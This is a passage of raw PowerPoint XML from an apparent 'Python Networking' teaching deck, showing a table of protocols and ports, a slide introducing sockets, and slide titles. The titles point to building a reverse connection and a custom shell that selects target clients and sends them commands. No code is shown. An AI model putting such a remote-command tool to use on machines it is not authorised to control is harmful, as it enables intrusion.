                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1347690830"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>POP3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Fetching email</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>110</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Poplib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1735902674"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>IMAP4</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Fetching email</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>143</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Imaplib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3176929968"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Telnet</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Command lines</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>23</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Telnetlib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="55432985"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="370840">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Gopher</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>Document transfers</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0"/>
                        <a:t>70</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0" err="1"/>
                        <a:t>Gopherlib,urllib</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-IN" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1879410962"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8D3EE6-44E9-45A1-AE0F-CE9C23EF681F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798989" y="5348222"/>
            <a:ext cx="9196748" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To check, open the browser and type – google.com:80 -&gt; enter. It opens the google webpage.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4011815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9906-B5DD-44B3-9397-FED6827A44E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="740545" y="218013"/>
            <a:ext cx="10515600" cy="513764"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Introduction to Sockets</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D319CF2E-C1E7-4812-8FB5-C693F022D2AE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="564102" y="1187831"/>
            <a:ext cx="10590320" cy="3453413"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A socket is one endpoint of a two-way communication link between two programs running on the network.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>A socket is bound to a port number so that the TCP layer can identify the application that data is destined to be sent to.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>An endpoint is a communication of an IP address and a port number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>It is also the python object corresponding to a network connection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>The client program  creates a socket at the end of the communication and then it attempts to connect the socket to a server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Lets say, you have  your computer and your friends computer. To communicate between both of them, you need to create socket and that socket has to bind to IP address &amp; port no and then socket is able to send information to your friends computer and vice versa.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82759729-880A-4848-8A27-041029F94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172" y="4722920"/>
            <a:ext cx="1802167" cy="18021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41231BC0-E165-46E9-A621-AFA873996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238" y="4687409"/>
            <a:ext cx="1802167" cy="180216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F43153F8-A84E-4A13-A456-B0C488E789A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4110361" y="5424256"/>
            <a:ext cx="34978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936FB6B4-AF42-41AB-AF51-A2D793F9D6EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5036537" y="5070005"/>
            <a:ext cx="1645450" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>communication</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADE37C5F-A25B-404A-BEB8-1A606D9483FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2758567" y="5208504"/>
            <a:ext cx="759375" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Your</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F0BB262-CE04-46CA-A3C0-1772E227DD4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8379612" y="5144582"/>
            <a:ext cx="995785" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Friend</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="2400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14133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TotalTime>
  <Words>3496</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>416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Python Networking</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Basics of Networking – IP address</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Public &amp; Private IP</vt:lpstr>
      <vt:lpstr>Static and Dynamic IP</vt:lpstr>
      <vt:lpstr>Introduction to Ports</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Introduction to Sockets</vt:lpstr>
      <vt:lpstr>Socket  commands in Python</vt:lpstr>
      <vt:lpstr>Direct Connections</vt:lpstr>
      <vt:lpstr>Problems with direct connection</vt:lpstr>
      <vt:lpstr>Reverse Connection </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What is Server ?</vt:lpstr>
      <vt:lpstr>Server.py</vt:lpstr>
      <vt:lpstr>What is Client ?</vt:lpstr>
      <vt:lpstr>Client.py</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Multiple Clients Support</vt:lpstr>
      <vt:lpstr>Two tasks of Server.py file</vt:lpstr>
      <vt:lpstr>Creating Connection with Multiple Clients</vt:lpstr>
      <vt:lpstr>Handling Connections </vt:lpstr>
      <vt:lpstr>Creating Interactive Custom Shell/Terminal</vt:lpstr>
      <vt:lpstr>Listing the Connections</vt:lpstr>
      <vt:lpstr>Selecting Target Connection</vt:lpstr>
      <vt:lpstr>Sending Commands to Client</vt:lpstr>
      <vt:lpstr>Thread Flow</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Networking</dc:title>
  <dc:creator>Sunanda Naik</dc:creator>
  <cp:lastModifiedBy>Sunanda Naik</cp:lastModifiedBy>
  <cp:revision>66</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2021-04-09T18:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-06-18T13:26:22Z</dcterms:modified>
</cp:coreProperties>
</file>